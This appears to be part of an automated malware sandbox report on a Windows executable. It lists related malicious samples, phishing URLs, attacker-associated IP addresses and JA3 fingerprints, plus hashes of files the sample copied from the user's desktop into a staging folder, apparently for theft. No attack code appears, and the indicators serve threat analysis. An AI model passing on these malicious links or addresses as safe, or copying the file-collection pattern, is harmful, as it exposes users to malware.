	https://dev-operationstechnology.pantheonsite.io/otspec/	Get hash	malicious	Browse	104.18.10.207
	88nNT0x2j8.exe	Get hash	malicious	Browse	104.16.155.36
HETZNER-ASDE	xOoyjLMVjE.exe	Get hash	malicious	Browse	136.243.172.101
	https://secured-office2345612.webador.com/	Get hash	malicious	Browse	116.203.11.150
	wTIW4oFz6g.dll	Get hash	malicious	Browse	78.47.204.80
	58LyPAftcd.exe	Get hash	malicious	Browse	144.76.136.153
	SecuriteInfo.com.Exploit.Siggen3.34871.15797.xls	Get hash	malicious	Browse	5.9.116.246
	SecuriteInfo.com.W32.AIDetectNet.01.14993.exe	Get hash	malicious	Browse	78.46.5.205
	d04805a3-219e-4ced-c1d7-08da6016293435cf4f9b-d85e-82ae-f9cf-a730c5f1a7fa.eml	Get hash	malicious	Browse	78.47.204.80
	v4RiuAnIoB.dll	Get hash	malicious	Browse	78.47.204.80
	kkm0VR9FXS.dll	Get hash	malicious	Browse	78.47.204.80
	kkm0VR9FXS.dll	Get hash	malicious	Browse	78.47.204.80
	List_5.doc.xls	Get hash	malicious	Browse	78.47.204.80
	6otREtFBIq.dll	Get hash	malicious	Browse	78.47.204.80
	W19HT0KfUm.dll	Get hash	malicious	Browse	78.47.204.80
	V1M8AMhbeH.dll	Get hash	malicious	Browse	78.47.204.80
	W19HT0KfUm.dll	Get hash	malicious	Browse	78.47.204.80
	rot0Asr7Of.dll	Get hash	malicious	Browse	78.47.204.80
	sA70rx0Jc4.exe	Get hash	malicious	Browse	78.47.60.126
	GsTsOa3GkW.dll	Get hash	malicious	Browse	78.47.204.80
	EKA7oJvSQN.dll	Get hash	malicious	Browse	5.9.116.246
	hCPOE3w2yW.dll	Get hash	malicious	Browse	78.47.204.80

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	xOoyjLMVjE.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	R6NX4p7diT.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	EMAIL UPGRADE SERVER PDF saw67jvrelYo5gb.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	NitroGen By MaskeZen.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	58LyPAftcd.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	https://app.box.com/s/vd9i5soq6fwt44m7oakxblduhi79oxmz	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	https://netorgft4483117-my.sharepoint.com/:b:/g/personal/david_otspec_com/ER8fT_z939BFgbAQ5vKoGeYBFRfHHYB10Cxusr9bIdiN0Q?e=4%3a3BfqJR&at=9	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	purchae order notification!!!purchae order notification!!!.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	rdjqp7Zson.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	Objedn#U00e1vkov#U00fd formul#U00e1r.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	https://incrol.plecicay.xyz/	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	ciijus.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	SecuriteInfo.com.Trojan.MSIL.Kryptik.a1facc37.27464.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	gin9xV9W53.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%253A%252F%252Fwww.ugurtarim.com.tr%252Fwp-content%252Fuploads%252F2022%252F01%26sa%3DD%26sntz%3D1%26usg%3DAOvVaw3_MvY56gD68sWE_sGQd9XK	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	Dhl.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	XxOTmNv6Mv.exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	Sat#U0131n_alma_sipari#U015fi_(P.O-4210435)_Silvan_Sanayi A.#U015e..exe	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	Ddwyn87EEl.dll	Get hash	malicious	Browse	136.243.172.101 188.114.96.3
	Ddwyn87EEl.dll	Get hash	malicious	Browse	136.243.172.101 188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dBvNa2pTbj.exe.log

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1219
Entropy (8bit):	5.355002832885189
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7r1qE4jE4KYE4psXE4j:MxHKXwYHKhQnoPtHoxHhAHKzvr1qHjHs
MD5:	137A89138E3E0F3C8AA359C8B58C32C1
SHA1:	93519C825C5108835BADED1FC17482FC0B4CE758
SHA-256:	6EC38797744CF07F3EB53B93E66709475EC64185D23B4110CC0DBFD20B182CD5
SHA-512:	C7DE7A66A2BFE882500609FC5BA96633355A4B558B6F8FD1FEFBAB39F7A14FC49F9A1C5B12145A2480027C1A262FF964C6B1D1C5AF74D6DEEE618B4DEF02AA39
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, Publi

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\AIXACVYBSB.png

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:	12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\BJZFPPWAPT\EOWRVPQCCS.jpg

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\BJZFPPWAPT\ZGGKNSUKOP.png

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\EOWRVPQCCS.jpg

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\GIGIYTFFYT.jpg

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\IVHSHTCODI\AIXACVYBSB.png

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:	12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\IVHSHTCODI\TQDGENUHWP.jpg

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\PALRGUCVEH\GIGIYTFFYT.jpg

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\PALRGUCVEH\TQDFJHPUIU.png

Download File

Process:	C:\Users\user\Desktop\dBvNa2pTbj.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697771666106845
Encrypted:	false
